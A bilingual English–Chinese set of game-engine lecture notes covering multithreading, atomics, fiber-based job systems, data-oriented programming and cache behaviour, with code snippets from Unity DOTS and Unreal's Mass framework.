    // Execute for each selected entity
    trans = newTranslation()
    {
    // dT is a captured variable
    Value = trans.Value + velocity.Value * dT};
    }
    ).ScheduleParallel(); // Schedule as a parallel job
    }
    }

    Unity C# Job System

    Unity C# 任务系统

    Make it easier forusers to write correct multithreaded code

    使用户更容易编写正确的多线程代码

    • A job is a small unit of work that performs a specific task

      作业是执行特定任务的小工作单元

    • Jobs can depend on other jobs to complete before they run

      作业在运行之前可以依赖其他作业来完成

    public struct FirstJob: IJob
    {
    publicvoidExecute()
    {
    ...
    }
    }

    public struct SecondJob: IJob
    {
    public void Execute()
    {
    ...
    }
    }
    varfirst_job = newFirstJob();
    varsecond_job = newSecondJob();

    // execute first_job
    varfirst_job_handle = first_job.Schedule();

    // second_job depends on first_job to complete
    second_job.Schedule(first_job_handle);

    Unity C# Job System–Native Container

    Unity C# 作业系统——原生容器

    A type of shared memory that can be accessed inside jobs

    一种可以在作业内部访问的共享内存

    • Job cannot output result without native container (all data is a copy)

      没有本机容器,作业无法输出结果(所有数据都是副本)

    • Native containers support all safety checks

      本地容器支持所有安全检查

    • Native containers need to be disposed manually

      本地容器需要手动处理

    // Allocate one float with "TempJob" policy
    // Allocator.Temp: Fastest allocation, lifespan is 1 frame or fewer
    // Allocator.TempJob: Slower than Temp, lifespan is 4 frames
    // Allocator.Persistent: Slowest allocation, can last as long as needed
    NativeArray<float> a= newNativeArray<float>(1, Allocator.TempJob);
    ...
    // Need to dispose manually for unmanaged memory
    a.Dispose();

    Unity C# Job System –Safety System

    Unity C# 作业系统-安全系统

    Support safety checks (out of bounds checks, deallocation checks, race condition checks) for jobs

    支持作业的安全检查(越界检查、取消分配检查、竞争条件检查)

    • Send each job a copy of data it needs to operate on to eliminate the race condition

      向每个作业发送一份它需要操作的数据副本,以消除竞争条件

      • Job can only access blittable data types (reference is invalid)

        作业只能访问 blitable 数据类型(引用无效)

    public struct Job: IJob
    {
    public float a;
    public float b;
    public void Execute()
    {
    ...
    }
    }

    webp

    High-Performance C# and Burst Compiler

    高性能 C# 和 Burst 编译器

    High-Performance C# (HPC#) is a subset of C#

    高性能 C#(HPC#)是 C# 语言的一个子集

    • Give up on most of the standard library (StringFormatter, List, Dictionary, and etc.)

      放弃大部分标准库(StringFormatter、List、Dictionary 等)

    • Disallow allocations, reflection, the garbage collector and virtual calls

      不允许分配、反射、垃圾收集器和虚拟调用

    Burst Compiler translates from IL/.NET bytecode to highly optimized native code using LLVM

    Burst 编译器从 IL/ 转换而来。使用 LLVM 将 NET 字节码转换为高度优化的本机代码

    • Generate expected machine code for specific platforms

      为特定平台生成预期的机器代码

    webp

    Unreal Mass Framework

    webp

    MassEntity–Entity

    MassEntity–实体

    • FMassEntityHandle is pure ID as ECS Entity

      FMassEntityHandle 是 ECS 实体的纯 ID

    • Index indicates the index in Entities array in FMassEntityManager

      索引表示 FMassEntityManager 中实体数组中的索引

    • SerialNumberas salt to Index

      序列号作为索引的盐

      • Release an old entity

        释放旧实体

      • Create a new entity with the same Index

        使用相同的索引创建新实体

      • SerialNumberis increased so the ID will be different

        序列号增加,因此 ID 将不同

    struct FMassEntityHand1e
    {
    ...
    int32 Index = 0;
    int32 SerialNumber = 0;
    ...
    }
    struct MASSENTITY_API FMassEntityManager
    {
    ...
    TChunkedArray<FEntityData> Entities;
    TArray<int32> EntityFreeIndexList;
    ...
    }

    MassEntity–Component

    MassEntity——组件

    • Same as Unity, each type of entity has an Archetype

      与 Unity 相同,每种类型的实体都有一个原型

    • Fragments and tagsare componentsfor entities

      片段和标记是实体的组成部分

    • Tags are constant Boolean components to filter unnecessary processing

      标签是用于过滤不必要处理的常量布尔组件

    struct FMassArchetypeCompositionDescriptor
    {
    ...
    FMassFragmentBitSetFragments;
    FMassTagBitSetTags;
    FMassChunkFragmentBitSetChunkFragments;
    FMassSharedFragmentBitSetSharedFragments;
    }

    webp

    MassEntity–Systems

    MassEntity——系统

    • ECS Systems in MassEntity are Processor sderived from UMassProcessor

      MassEntity 中的 ECS 系统是从 UMassProcessor 派生的处理器

    • Two important interface: ConfigureQueries() and Execute(...)

      两个重要的接口:ConfigureQueries()Execute(…)

    class MASSENTITY_API UMassProcessor: publicUObject
    {
    ...
    protected:
    virtual void ConfigureQueries() PURE_VIRTUAL(UMassProcessor::ConfigureQueries);
    virtual void PostInitProperties() override;
    virtual void Execute(
    FMassEntityManager&EntityManager,
    FMassExecutionContext&Context) PURE_VIRTUAL(UMassProcessor::Execute);
    ...
    }

    MassEntity–Fragment Query

    MassEntity——片段查询

    • Interface ConfigureQueries() runs when the processor is initialized

      处理器初始化时,接口 ConfigureQueries() 运行

    • Use FMassEntityQuery to filter archetypes of entities meeting systems requirements

      使用 FMassEntityQuery 筛选满足系统要求的实体原型

    • FMassEntityQuery caches filtered archetypes to accelerate future executions

      FMassEntityQuery 缓存经过筛选的原型以加速未来的执行

    webp

    void UMassApplyMovementProcessor::ConfigureQueries()
    {
    EntityQuery.AddRequirement<FMassVelocityFragment>(EMassFragmentAccess::ReadWrite);
    EntityQuery.AddRequirement<FTransformFragment>(EMassFragmentAccess::ReadWrite);
    EntityQuery.AddRequirement<FMassForceFragment>(EMassFragmentAccess::ReadWrite);
    EntityQuery.AddTagRequirement<FMassOffLODTag>(EMassFragmentPresence::None);
    EntityQuery.AddConstSharedRequirement<FMassMovementParameters>(EMassFragmentPresence::All);
    }

    MassEntity–Execute

    MassEntity——执行

    webp

    Conclusions

    结论

    Everything You Need Know About Performance

    关于性能,你需要知道的一切

    webp

    ​这张图展示了 CPU 各种操作所耗的时间。

    References

    Cache

    Parallel Programming

    Parallel Frameworks in Game Engine

    DOP

    Unity DOTS

    Unreal Engine Mass Architecture

    Multimedia Material List

    ]]>
    资源

    课程

    第二十节:现代游戏引擎架构:面向数据编程与任务系统

    Code Execution Is Not As Simple As It Looks

    代码执行并不像看起来那么简单

    Code is executed on top of specific hardware and operating system

    代码在特定硬件和操作系统上执行

    • Hardware and OS must be considered if we want to write a high performance program

      如果我们想编写高性能程序,就必须考虑硬件和操作系统

    webp

    Basics of Parallel Programming

    并行程序设计基础

    Ceiling of Moore’s Law and Multi-Cores

    摩尔定律的上限与多核

    • The number of transistors in a dense integrated circuit (IC) doubles about every two years

      密集集成电路(IC)中的晶体管数量大约每两年翻一番

    • In recent years, chip densities are no longer doubling every two years

      近年来,芯片密度不再每两年翻一番

    • Multi-core processors become the new industry trend

      多核处理器成为新的行业趋势

    webp

    ​处理器的精度和频率的提升达到了一个瓶颈,添加更多核心成为提升处理器性能的一个趋势。

    Process and Thread

    进程和线程

    Process

    进程

    • The instance of an application (or program)

      应用程序(或程序)的实例

    • Has its own individual region of memory

      有自己的内存空间

    Thread

    线程

    • Preemptive multitasking

      抢占式多任务处理

    • The smallest unit of task that can be scheduled by OS

      操作系统可以调度的最小任务单元

    • Must reside in a process

      必须驻留在进程中

    • Threads in the same process share the same region of memory

      同一进程中的线程共享同一内存区域(处理不好容易出 bug)

    webp

    Types of Multitasking

    多任务处理的类型

    webp

    Preemptive Multitasking

    抢占式多任务处理

    • Currently executing task can be interrupted at a time decided by the scheduler

      当前正在执行的任务可以在调度程序决定的时间中断

    • Scheduler determines which task to be executed next

      调度器确定下一个要执行的任务

    • Applied in most operating systems

      适用于大多数操作系统

    webp

    Non-preemptive Multitasking

    非抢占式多任务处理

    • Tasks must be explicitly programmed to yield control

      任务必须显式编程让出控制权

    • Tasks must cooperate for the scheduling scheme to work

      任务必须配合调度方案才能发挥作用

    • Currently many real-time operating systems (RTOS) also support this kind of scheduling

      目前,许多实时操作系统(RTOS)也支持这种调度

    Thread Context Switch

    线程上下文切换

    Store the state of a thread and resume the execution at a later point

    存储线程的状态,并在稍后恢复执行

    • State including registers, stack and other OS required data

      状态,包括寄存器、堆栈和其他操作系统所需的数据

    • Thread context switch implies extra user-kernel mode switch

      线程上下文切换意味着额外的用户内核模式切换

    • Cache invalidation after context switch has even more cost

      上下文切换后缓存失效的成本更高

    webp

    Cache invalidation may take 10,000~1,000,000 cycles

    缓存失效可能需要 10000~1000000 个周期

    Parallel Problems in Parallel Computing

    并行计算中的并行问题

    Embarrassingly Parallel Problem (or Perfectly Parallel)

    易并行计算问题(或称完全并行问题)

    • Little or no dependency or need for communication between parallel tasks

      并行任务之间很少或不需要通信

    webp

    Monte Carlo algorithm is a typical example of embarrassingly parallel

    蒙特卡洛算法是易并行计算问题的典型例子(使用多线程计算蒙特卡洛积分)

    Non-embarrassingly Parallel Problem

    非易并行问题

    • Communication is needed between parallel tasks

      并行任务之间需要通信

    webp

    Data Race in Parallel Programming

    并行编程中的数据竞争

    Multiple threads in a single process access the same memory location concurrently

    单个进程中的多个线程同时访问同一内存位置

    • At least one of the accesses is for writing

      至少有一次访问是写操作

    while(job_count < 100) {
        doSomething();
        job_count++;
    }
    • Read job_count

      读取 job_count

    • Compute job_count + 1

      计算 job_count + 1

    • Write new job_count

      写回新的 job_count

    webp

    Blocking Algorithm - Locking Primitives

    阻塞算法——锁原语

    Lock

    • Only one thread can acquire the lock at a time

      一次只能有一个线程获取锁

    • Make a critical section for shared resource access

      为共享资源的访问构造临界区

    webp

    Only one thread can execute this part of the code at a time

    同一时刻只有一个线程可以执行这部分代码
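
    ​下面是笔者补充的一个临界区示意(仅为草图,doSomething、线程数等均为假设),用 C++ 标准库的 std::mutex 保护上文 job_count 例子中的读-改-写操作:

    #include <mutex>
    #include <thread>

    int job_count = 0;
    std::mutex job_mutex;

    void worker() {
        while (true) {
            std::lock_guard<std::mutex> guard(job_mutex); // 获取锁,作用域结束自动释放
            if (job_count >= 100) break;
            // doSomething();                             // 对共享资源的操作放在临界区内
            ++job_count;                                  // 读-改-写此时是互斥的
        }
    }

    int main() {
        std::thread t1(worker), t2(worker);
        t1.join();
        t2.join();
    }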

    Other Issues with Locks

    锁的其他问题

    • Thread suspending and resuming will bring performance overhead

      线程挂起和恢复将带来性能开销

    • Suspended threads never get resumed if the thread that acquires the lock exits abnormally

      如果获取锁的线程异常退出,则挂起的线程永远不会恢复

    • Priority Inversion

      优先级反转

      • A higher priority task attempts to acquire the lock that is already acquired by a lower priority task

        较高优先级的任务试图获取较低优先级任务已经获取的锁

    webp

    Atomic Operation: Lock-free Programming

    原子操作:无锁编程

    Atomic Loads and Stores

    原子加载与存储

    • Load: Load data from shared memory to either a register or thread-specific memory

      加载:将数据从共享内存加载到寄存器或线程特定内存

    • Store: Move data into shared memory

      存储:将数据移动到共享内存中

    Atomic Read-Modify-Write (RMW)

    原子读修改写(RMW)

    • Test and Set: write 1 to shared memory and return the previous value

      测试并设置:向共享内存写入 1,并返回之前的值

    • Compare and Swap (CAS): Update the data in shared memory if it equals an expected value

      比较和交换(CAS):如果共享内存中的数据等于预期值,则更新该数据

    • Fetch and Add: Add a value to the data in shared memory and return the previous value

      取并加:将一个值加到共享内存中的数据上,并返回之前的值

    webp

    C++11 和 C++20 提供了原子操作的语句。

    Lock Free vs. Wait Free

    webp

    • wait-free:不管 OS 如何调度线程,每个线程始终在做有用的事情。

    • lock-free:不管 OS 如何调度线程,至少有一个线程在做有用的事情。

    Compiler Reordering Optimizations

    编译器重新排序优化

    webp

    ​编译器将高级语言编译为汇编时,可能通过优化改变代码的执行顺序;这在单线程下语义不变,但在多线程下可能出现奇怪的情况。

    Problem of Memory Reordering

    内存重新排序问题

    • Compilers and CPUs often modify the execution order of instructions to optimize performance

      编译器和 CPU 经常修改指令的执行顺序以优化性能

    • It’s the hard part of parallel programming

      这是并行编程的难点

    webp

    assert 是 C/C++ 中的一个宏,用于在运行时检查一个条件是否为真。如果条件不满足,则运行时将终止程序的执行并输出一条错误信息。

    ​如果 Thread 1 进行了编译器优化,则 Thread 2 可能不会在 assert(a==2); 处抛出错误。
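
    ​下面是笔者补充的示意代码(仅为草图,变量名为假设),对应上述 assert 例子:若两个写操作被重排,Thread 2 可能在 a 还是 0 时就看到标志位被置位;使用 release/acquire 原子序可以禁止这种重排:

    #include <atomic>
    #include <cassert>
    #include <thread>

    int a = 0;
    std::atomic<int> ready{0};

    void thread1() {
        a = 2;                                     // 必须在 ready 置位前对外可见
        ready.store(1, std::memory_order_release); // release:发布上面的写入
    }

    void thread2() {
        while (ready.load(std::memory_order_acquire) != 1) {}
        assert(a == 2);                            // 由 acquire/release 语义保证
    }

    int main() {
        std::thread t1(thread1), t2(thread2);
        t1.join();
        t2.join();
    }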

    Out-of-order Execution by CPUs

    CPU 的乱序执行

    For different CPUs

    对于不同的 CPU

    • The optimization strategies are significantly different

      优化策略明显不同

    • Provides different types of memory order guarantees

      提供不同类型的内存顺序保证

    • Parallel programs require different processing

      并行程序需要不同的处理

    webp

    ​有些 CPU 不保证执行顺序,导致同一段代码在平台 A 运行正常,在平台 B 却运行异常。

    Parallel Framework of Game Engine

    游戏引擎的并行框架

    Fixed Multi-thread

    固定多线程

    One fixed thread for each part of the game engine logic

    游戏引擎逻辑的每个部分都有一个固定线程

    • Render, Simulation, Logic, Network, and etc.

      渲染、模拟、逻辑、网络等

    • Easy to implement

      易于实现

    webp

    Issues with Fixed Multi-thread

    固定多线程的问题

    • The workload is unbalanced among threads (cores)

      线程(核心)之间的工作负载不平衡

    • Not scalable as the number of processor cores grows

      无法随处理器核心数量的增加而扩展

    webp

    ​还是容易出现其它核心陪跑的情况。

    Thread Fork-Join

    线程 Fork-Join

    Fork-join for data-parallelizable work (based on fixed multi-thread)

    对可数据并行的工作使用 Fork-Join(基于固定多线程)

    • Use a thread pool to prevent frequent thread creation/destruction

      使用线程池来防止频繁的线程创建/销毁

    webp

    Problems with Thread Fork-Join

    线程 Fork-Join 的问题

    • Not easy for logic programmers (work split, work threads count)

      对逻辑程序员来说不容易(如何拆分工作、开多少个工作线程)

    • Too many threads can bring performance overhead on context switch

      太多的线程会给上下文切换带来性能开销

    • The workload is still unbalanced among threads (cores)

      线程(核心)之间的工作负载仍然不平衡

    webp

    Unreal Parallel framework

    虚幻并行框架

    Two types of threads

    两种类型的线程

    • Named Thread

      命名线程

      • Created by other systems and attached to parallel framework

        由其他系统创建并附加到并行框架

    • Worker Thread

      工作线程

      • Three priorities: high, middle and low

        三种优先级:高、中、低

      • The number is determined by the number of CPU cores

        该数量由 CPU 内核的数量决定

    webp

    Taskgraph

    任务图

    A directed acyclic graph

    有向无环图

    • Node→Task

      节点→任务

    • Edge→Dependency

      边→依赖

    webp

    通过链接构建任务图

    webp
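
    ​下面是笔者补充的任务图节点示意(仅为草图,类型与函数名均为假设):每个任务记录未完成的前驱数,任务完成时递减其后继的计数,计数归零的后继即可被调度:

    #include <atomic>
    #include <functional>
    #include <vector>

    struct Task {
        std::function<void()> work;         // 节点:任务本身
        std::vector<Task*> successors;      // 边:依赖此任务的后继
        std::atomic<int> remaining_deps{0}; // 尚未完成的前驱数量
    };

    // 任务完成后调用:把入度归零的后继放入就绪队列
    void on_task_finished(Task& t, std::vector<Task*>& ready_queue) {
        for (Task* next : t.successors)
            if (next->remaining_deps.fetch_sub(1) == 1) // 自己是最后一个前驱
                ready_queue.push_back(next);
    }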

    Job System

    任务系统

    Coroutine

    协程

    Allows for multitasking by creating jobs that run inside of coroutines

    通过创建在协程内运行的任务,允许多任务处理

    • Coroutine is a lightweight execution context (include a user provided stack, registers…)

      协程是一个轻量级的执行上下文(包括用户提供的堆栈、寄存器等)

      • Execution is cooperative, meaning a coroutine can explicitly switch to another

        执行是协作式的,协程之间可以显式地相互切换

    webp

    Coroutine vs. Thread

    webp

    Coroutine

    协程

    • Scheduled by programmers

      由程序员调度

    • To be executed within a thread

      在线程内执行

    • Context switch is faster without kernel switch

      无需内核切换,上下文切换速度更快

    Thread

    线程

    • Scheduled by operating system

      由操作系统调度

    • Resides in a process

      驻留在进程中

    • Context switch is costly with kernel switch

      内核切换的上下文切换成本很高

    Stackful Coroutine

    有栈协程

    Coroutine owns an independent runtime stack which is reserved after yield

    Coroutine 拥有一个独立的运行时堆栈,该堆栈在 yield 后保留

    • Able to yield from within a nested stack frame

      可以在嵌套的栈帧内 yield

    • Use local variables just like normal functions

      像普通函数一样使用局部变量

    webp

    ​在 C++ 中,yield() 通常用于多线程编程中,来让出当前线程的执行权。具体来说,它的作用取决于你使用的线程库或框架。以下是几种常见的使用情况:

    1. std::this_thread::yield()(在 C++11 及以后的版本中):

      • 这是 C++ 标准库中的一个函数,声明在 <thread> 头文件中。

      • std::this_thread::yield() 使当前线程暂停执行,并允许其他同等优先级的线程有机会运行。它通常用于在多线程环境中优化资源使用,尤其是在忙等待的情况下。

      • 示例代码:

        #include <iostream>
        #include <thread>

        void worker() {
            for (int i = 0; i < 10; ++i) {
                std::cout << "Working...\n";
                std::this_thread::yield(); // 让出线程执行权
            }
        }

        int main() {
            std::thread t(worker);
            t.join();
            return 0;
        }
    2. co_yield 与 promise 类型的 yield_value()(在 C++20 协程中):

      • C++20 的协程机制声明在 <coroutine> 头文件中;协程体内的 co_yield 表达式会调用 promise 对象的 yield_value(),用于协程的挂起和恢复。
      • 这允许在协程中挂起执行,并在之后恢复,提供了更高级的控制流功能。

    ​在使用 yield() 时,需要注意它不会阻塞当前线程,而只是提示调度器当前线程愿意暂停执行。调度器将决定是否实际暂停当前线程以及何时恢复它。yield() 是一种建议,具体的调度行为取决于底层操作系统的线程调度策略。

    ​总的来说,yield() 用于提高多线程程序的效率,避免在某些情况下导致不必要的资源占用或提高线程的响应性。

    Stackless Coroutine

    无栈协程

    Coroutine has no independent runtime stack to be reserved when yielding

    协程在 yield 时没有需要保留的独立运行时栈

    • Only the top-level routine may yield (subroutines have no idea where to resume without a stack)

      只有顶层例程可以 yield(没有栈,子例程不知道该恢复到哪里)

    • The data that is required to resume execution should be stored separately from the stack

      恢复执行所需的数据应与堆栈分开存储

    webp
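
    ​作为补充示例(笔者草图):C++20 的协程正是无栈协程,协程状态保存在独立分配的协程帧里而不是调用栈上,且只有协程体本身可以 co_yield。下面是一个最小的生成器示意:

    #include <coroutine>
    #include <iostream>

    struct Generator {
        struct promise_type {
            int current_value{};
            Generator get_return_object() {
                return Generator{std::coroutine_handle<promise_type>::from_promise(*this)};
            }
            std::suspend_always initial_suspend() noexcept { return {}; }
            std::suspend_always final_suspend() noexcept { return {}; }
            std::suspend_always yield_value(int v) noexcept { current_value = v; return {}; }
            void return_void() noexcept {}
            void unhandled_exception() { std::terminate(); }
        };

        std::coroutine_handle<promise_type> handle;
        explicit Generator(std::coroutine_handle<promise_type> h) : handle(h) {}
        ~Generator() { if (handle) handle.destroy(); }

        bool next() { handle.resume(); return !handle.done(); }
        int value() const { return handle.promise().current_value; }
    };

    Generator counter(int limit) {
        for (int i = 0; i < limit; ++i)
            co_yield i; // 挂起点:状态保存在协程帧中,而非栈上
    }

    int main() {
        Generator g = counter(3);
        while (g.next())
            std::cout << g.value() << '\n'; // 输出 0 1 2
    }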

    Stackful vs. Stackless Coroutine

    有栈协程与无栈协程

    Stackful Coroutine

    有栈协程

    • More powerful: able to yield from within a nested stack frame

      更强大,支持在嵌套栈帧内 yield

    • Needs more memory to reserve stacks for each coroutine

      需要更多内存为每个协程保留堆栈

    • Coroutine context switch takes more time

      协程上下文切换需要更多时间

    Stackless Coroutine

    无栈协程

    • Unable to yield from within a subroutine

      无法在子例程内 yield

    • More difficult to use without a stack to reserve data

      如果没有堆栈来保留数据,则更难使用

    • No extra memory needed for coroutine’s stack

      协程堆栈不需要额外的内存

    • Faster context switch

      更快的上下文切换

    Fiber-based Job System

    基于纤程(Fiber)的任务系统

    Allows for multitasking by creating jobs instead of threads

    通过创建任务而不是线程来实现多任务处理

    • Fiber is like coroutine except that fiber is scheduled by a scheduler

      纤程类似于协程,区别在于纤程由调度器调度

    • Thread is the execution unit while fiber is the context

      线程是执行单元,纤程是上下文

      • One thread for each processor core to minimize the context switch overhead

        每个处理器核心一个线程,以最大限度地减少上下文切换开销

    • Job is executed within the context of a fiber

      任务在纤程的上下文中执行

    webp

    One Work Thread for One Core

    一个核心对应一个工作线程

    To minimize the overhead of thread context switch

    尽量减少线程上下文切换的开销

    • Multiple work threads for a single core still suffers from context switch

      单个核心的多个工作线程仍然受到上下文切换的影响

    • One work thread for each core eliminates context switch

      每个核心都有一个工作线程,消除了上下文切换

    webp

    Fiber-based Job System

    基于纤程的任务系统

    • Thread is the execution unit while fiber is the context

      线程是执行单元,纤程是上下文

    • Job is executed within a fiber

      任务在纤程内执行

    webp

    Job Scheduler - Global Job

    LIFO and FIFO Mode

    LIFO 和 FIFO 模式

    • Schedule Model

      计划模型

      • First In First Out (FIFO)

        先进先出(FIFO)

      • Last In First Out (LIFO)

        后进先出(LIFO)

    • LIFO Mode

      • In most cases, job dependencies are tree-like

        在大多数情况下,任务之间的依赖关系是树状的

      • Some systems occasionally add jobs and then immediately wait on them

        有些系统偶尔会添加任务并立即等待其完成

    Job Scheduler - Job Dependency

    Job Scheduler - Job Stealing

    Pros and Cons of Job System

    Pros

    • Easy to implement task scheduling

      易于实现任务调度

    • Easy to handle task dependency

      易于处理任务依赖关系

    • Job stack is isolated

      任务堆栈是隔离的

    • Avoid frequent context switches

      避免频繁的上下文切换

    Cons

    • C++ does not natively support fiber

      C++ 本身不支持纤程

    • Implementation differs between operating systems

      操作系统之间的实现不同

    • Has some restrictions (thread_local invalid)

      有一些限制(thread_local 无效)

    Programming Paradigms

    编程范式

    Procedure-oriented Programming

    面向过程的程序设计

    Object-oriented Programming

    面向对象程序设计

    Programming Paradigm of Game Engine

    游戏引擎的编程范式

    • There are many different programming paradigms

      有许多不同的编程范式

    • In practice, some paradigms are widely used

      在实践中,一些范式被广泛使用

    • Programming languages aren’t always tied to a specific paradigm

      编程语言并不总是与特定的范式联系在一起

    webp

    Procedural Oriented Programming (POP)

    面向过程编程(POP)

    • Follows a step-by-step approach to break down a task into a collection of variables and routines (or subroutines) through a sequence of instructions

      遵循循序渐进的方法,通过一系列指令将任务分解为变量和例程(或子程序)的集合

    • Impossible to write a game engine in this way

      无法以这种方式编写游戏引擎

      • Data is not well maintained.

        数据没有得到很好的维护。

      • A correlation with real-world objects is difficult

        与现实世界中的物体建立关联是困难的

    Object-Oriented Programming (OOP)

    面向对象程序设计(OOP)

    • Based on the concept of “objects”, which can contain data and code

      基于“对象”的概念,对象可以包含数据和代码

    • It’s natural for humans to abstract the real world in an object-oriented way

      人类以面向对象的方式对现实世界进行抽象是很自然的

    webp

    Problems of OOP: Where to Put Code?

    面向对象编程的问题:把代码放在哪里?

    webp

    ​当攻击者击中对象时,是执行 Attacker.doDamageTo() 还是 Victim.receiveDamage()

    ​当玩家接触敌人时,是执行 Player.attachTo() 还是 Enemy.isAttached()

    Problems of OOP: Method Scattering in Inheritance Tree

    面向对象程序的问题:继承树中的方法分散

    • Hard to know which parent class has the method implementation

      很难知道哪个父类有方法实现

    webp

    ​为了找到玩家攻击敌人的代码逻辑,有可能从继承树中套好几层才找到代码。

    Problems of OOP: Messy Base Class

    面向对象编程的问题:混乱的基类

    class ENGINE_API AActor : public UObject
    {
        ...
        const FTransform& GetTransform() const;
        const FTransform& ActorToWorld() const;
        FVector GetActorForwardVector() const;
        FVector GetActorUpVector() const;
        FVector GetActorRightVector() const;
        virtual void GetActorBounds(...) const;
        virtual FVector GetVelocity() const;
        float GetDistanceTo(const AActor* OtherActor) const;
        virtual void SetActorHiddenInGame(bool bNewHidden);
        bool GetActorEnableCollision() const;
        bool HasAuthority() const;
        UActorComponent* AddComponent(...);
        void AttachToActor(...);
        void DetachFromActor(const FDetachmentTransformRules& DetachmentRules);
        bool GetTickableWhenPaused();
        bool IsActorInitialized() const;
        void ReceiveAnyDamage(...);
        void GetOverlappingActors(...) const;
        virtual void SetLifeSpan(float InLifespan);
        virtual void Serialize(FArchive& Ar) override;
        virtual void PostLoad() override;
        ...
    }

    Parts of methods of a “messy base class”

    “混乱的基类”的部分方法(代码可读性差)

    Find some methods in common? Put them in the base class! → We get a messy base class

    发现一些公共方法?把它们放进基类!→ 我们就得到了一个混乱的基类

    This is not the best OO design, and it certainly is possible to make a better one.
    But also, often code ends up being like this, even if no one wanted it that way.

    这不是最好的 OO 设计,当然有可能做出更好的 OO 设计。
    但是,即使没有人希望这样,代码最终也往往是这样的。

    Problems of OOP: Performance

    面向对象编程的问题:性能

    • Memory scattering

      内存分散

    • Jungle of virtual functions

      虚函数丛林

    webp

    ​面向对象编程可能导致运行时地址分散,Cache 命中率低,性能差。

    Problems of OOP: Testability

    面向对象编程的问题:可测试性

    • Unit Testing

      单元测试

      • OO designs often need a lot of setup to test

        OO 设计通常需要大量的设置来测试

    webp

    Data-Oriented Programming (DOP)

    面向数据编程(DOP)

    Processor-Memory Performance Gap

    处理器内存性能差距

    • Performance of memory grows much more slowly than that of processors

      内存性能的增长速度远慢于处理器

    • The gap keeps growing, making memory the main performance bottleneck for the CPU

      差距还在不断扩大,使内存成为 CPU 性能的主要瓶颈

    webp

    The Evolution of Memory - Cache

    内存的演进——缓存

    Add cache to speed up data reading

    添加缓存以加快数据读取速度

    • L1: Ranges between 256KB and no more than 1MB, but even that is sufficient.

      L1:范围在 256KB 到不超过 1MB 之间,但即使这样也足够了。

    • L2: Usually a few megabytes and can go up to 10MB.

      L2:通常为几兆字节,最高可达 10MB。

    • L3: Larger than L1 and L2, varies from 16MB to 64MB, shared between all cores.

      L3:大于 L1 和 L2,大小从 16MB 到 64MB 不等,在所有内核之间共享。

    webp

    Principle of Locality

    局部性原理

    the tendency of a processor to access the same set of memory locations repetitively over a short period of time

    处理器在短时间内重复访问同一组存储位置的趋势

    Spatial Locality

    空间局部性

    • The use of data elements within relatively close storage locations

      在相对较近的存储位置内使用数据元素

    webp

    Single instruction multiple data (SIMD)

    单指令多数据(SIMD)

    webp

    LRU (Least Recently Used)

    LRU(最近最少使用)

    • When the cache is full, discards the least recently used cache line first.

      当缓存已满时,首先丢弃最近最少使用的缓存行。

      • Record the “used time” of each cache line

        记录每个缓存行的“使用时间”

      • Discard the “oldest used” cache line each time

        每次丢弃最久未被使用的缓存行

      • Update the “used time” when accessing data in a cache line

        访问缓存行数据时更新“已用时间”

    webp
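
    ​下面是笔者补充的 LRU 策略示意(仅为软件层面的草图,真实 CPU 缓存是按组在硬件中近似实现 LRU 的):

    #include <cstdint>
    #include <list>
    #include <unordered_map>

    // 以缓存行地址为键,最多容纳 capacity 条缓存行
    struct LruCache {
        size_t capacity;
        std::list<uint64_t> order; // 队首 = 最近使用
        std::unordered_map<uint64_t, std::list<uint64_t>::iterator> lines;

        explicit LruCache(size_t cap) : capacity(cap) {}

        // 命中返回 true;未命中时加载该行,已满则先淘汰最久未使用的行
        bool access(uint64_t line_addr) {
            auto it = lines.find(line_addr);
            if (it != lines.end()) { // 命中:刷新“使用时间”
                order.splice(order.begin(), order, it->second);
                return true;
            }
            if (lines.size() == capacity) { // 已满:丢弃最久未使用的缓存行
                lines.erase(order.back());
                order.pop_back();
            }
            order.push_front(line_addr); // 加载新行
            lines[line_addr] = order.begin();
            return false;
        }
    };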

    Cache Line

    缓存行

    • Data is transferred between memory and cache in blocks of fixed size (typically 64 bytes), called cache lines or cache blocks.

      数据在内存和缓存之间以固定大小的块(通常为 64 字节)传输,这些块称为缓存行或缓存块。

    • A cache can only hold a limited number of lines, determined by the cache size. For example, a 64 kilobyte cache with 64-byte lines has 1024 cache lines.

      缓存只能容纳有限数量的行,由缓存大小决定。例如,具有 64 字节行的 64KB 缓存有 1024 条缓存行。

    • Every time you load any memory at all, you are loading in a full cache line of bytes

      每次加载任何内存,实际都会加载一整条缓存行的数据

    Cache Miss

    缓存未命中

    webp

    • When the cache is full (4 lines loaded), new lines will replace the oldest one

      当缓存已满(已加载 4 行)时,新的缓存行将替换最旧的一行

    • When an element is not in the cache, a whole cache line will be loaded

      当某个元素不在缓存中时,将加载整条缓存行

    Data-Oriented Programming (DOP)

    面向数据编程(DOP)

    1. Data is all we have

    ​我们只有数据

    webp

    ​示例:假设你正在开发一个游戏,并需要处理大量的游戏实体(例如玩家、敌人、NPC 等)。

    ​在面向对象编程(OOP)中,你可能会为每种实体创建一个类,并将属性和方法打包在一起:

    class Player:
        def __init__(self, x, y):
            self.x = x
            self.y = y

        def move(self, dx, dy):
            self.x += dx
            self.y += dy

    ​而在面向数据编程(DOP)中,你会将实体的属性分开存储,并编写独立的函数来操作这些属性:

    # 使用列表存储所有玩家的位置数据
    player_positions = [(0, 0), (5, 5), (10, 10)]

    def move_player(index, dx, dy):
        x, y = player_positions[index]
        player_positions[index] = (x + dx, y + dy)

    # 移动第一个玩家
    move_player(0, 1, 1)

    ​在这个例子中,player_positions 列表存储所有玩家的位置数据。move_player 函数则直接操作这些数据,不涉及复杂的对象方法。这种方式可以提高性能,尤其是在处理大量数据时,因为它减少了对象的开销,并且更容易进行批量操作和并行处理。

    Instructions are Data Too

    指令也是数据

    webp

    ​Code 和 Data 都是内存中的数据。

    Keep Code and Data Tight in Memory

    保持代码和数据在内存中的紧密性

    • Keep both code and data small and process in bursts when you can

      尽可能保持代码和数据的小规模,并以突发的方式处理

    webp

    Performance-Sensitive Programming

    性能敏感编程

    Reducing Order Dependency

    减少顺序依赖

    • The work being done because of a misprediction will have to be undone

      由于预测失误而完成的任务将不得不撤销

    • Never modify variables once they are initially assigned

      一旦变量最初被赋值,就永远不要修改它们

    webp

    These 2 parts of code will not be executed in parallel

    这两部分代码不会并行执行

    because variables a & b are reused from before

    因为变量 a 和 b 被重复使用

    webp

    The compiler allows these 2 parts of code to execute in parallel

    编译器允许这两部分代码并行执行

    Actually, compilers use static single-assignment (SSA) form to deal with simple situations like this

    实际上,编译器使用静态单赋值(SSA)来处理这样的简单情况
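
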